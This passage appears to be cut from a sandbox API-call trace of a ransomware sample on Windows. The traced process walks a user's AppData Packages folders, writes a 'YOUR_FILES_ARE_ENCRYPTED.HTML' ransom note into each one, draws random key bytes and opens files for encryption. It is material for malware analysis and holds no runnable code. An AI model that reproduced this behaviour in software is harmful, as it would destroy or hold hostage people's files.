ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.842] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.842] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0119.842] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.842] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0119.842] GetProcessHeap () returned 0x600000 [0119.842] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.844] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.845] CloseHandle (hObject=0x320) returned 1 [0119.846] GetProcessHeap () returned 0x600000 [0119.846] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.846] GetProcessHeap () returned 0x600000 [0119.846] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.846] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x7060301e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0119.846] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.846] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings") returned 109 [0119.846] GetProcessHeap () returned 0x600000 [0119.846] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.846] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings" [0119.846] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\*" [0119.846] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x7060301e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.846] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x7060301e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.846] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1218aa, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a1218aa, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a1218aa, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0119.846] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.846] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\roaming.lock") returned 122 [0119.846] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.846] lstrlenW (lpString=".lock") returned 5 [0119.847] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.847] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x913506cc, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x913506cc, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0119.847] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.847] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat") returned 122 [0119.847] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.847] lstrlenW (lpString=".dat") returned 4 [0119.847] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.847] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.847] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7060301e, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7060301e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7060301e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0119.847] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.847] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 127 [0119.847] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.847] lstrlenW (lpString=".LOG1") returned 5 [0119.847] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.847] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7060301e, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7060301e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7060301e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0119.847] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.847] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 127 [0119.847] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.847] lstrlenW (lpString=".LOG2") returned 5 [0119.847] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.847] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7060301e, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x7060301e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7060301e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0119.847] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.848] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0119.848] GetProcessHeap () returned 0x600000 [0119.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.849] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.850] CloseHandle (hObject=0x320) returned 1 [0119.850] GetProcessHeap () returned 0x600000 [0119.850] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.850] GetProcessHeap () returned 0x600000 [0119.850] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.850] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0119.850] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.850] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData") returned 114 [0119.850] GetProcessHeap () returned 0x600000 [0119.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.850] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData" [0119.850] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\*" [0119.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.851] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.851] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0fb669, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0fb669, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0fb669, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0119.851] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.851] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0119.851] GetProcessHeap () returned 0x600000 [0119.851] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.852] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.853] CloseHandle (hObject=0x320) returned 1 [0119.853] GetProcessHeap () returned 0x600000 [0119.853] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.853] GetProcessHeap () returned 0x600000 [0119.853] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.854] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8505eedb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0119.855] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.855] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState") returned 110 [0119.855] GetProcessHeap () returned 0x600000 [0119.855] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.856] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState" [0119.856] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\*" [0119.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8505eedb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.856] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8505eedb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.856] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8505eedb, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8505eedb, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x17e58369, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x204244, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="TileCache_100_0_Data.bin", cAlternateFileName="TILECA~2.BIN")) returned 1 [0119.856] StrStrIW (lpFirst="TileCache_100_0_Data.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.856] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Data.bin") returned 135 [0119.856] PathFindExtensionW (pszPath="TileCache_100_0_Data.bin") returned=".bin" [0119.856] lstrlenW (lpString=".bin") returned 4 [0119.856] PathFindExtensionW (pszPath="TileCache_100_0_Data.bin") returned=".bin" [0119.856] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Data.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\tilecache_100_0_data.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.856] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85038b9a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x85038b9a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xd916deee, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2f68, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="TileCache_100_0_Header.bin", cAlternateFileName="TILECA~1.BIN")) returned 1 [0119.857] StrStrIW (lpFirst="TileCache_100_0_Header.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.857] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Header.bin") returned 137 [0119.857] PathFindExtensionW (pszPath="TileCache_100_0_Header.bin") returned=".bin" [0119.857] lstrlenW (lpString=".bin") returned 4 [0119.857] PathFindExtensionW (pszPath="TileCache_100_0_Header.bin") returned=".bin" [0119.857] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.857] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\TileCache_100_0_Header.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\tilecache_100_0_header.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.857] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: 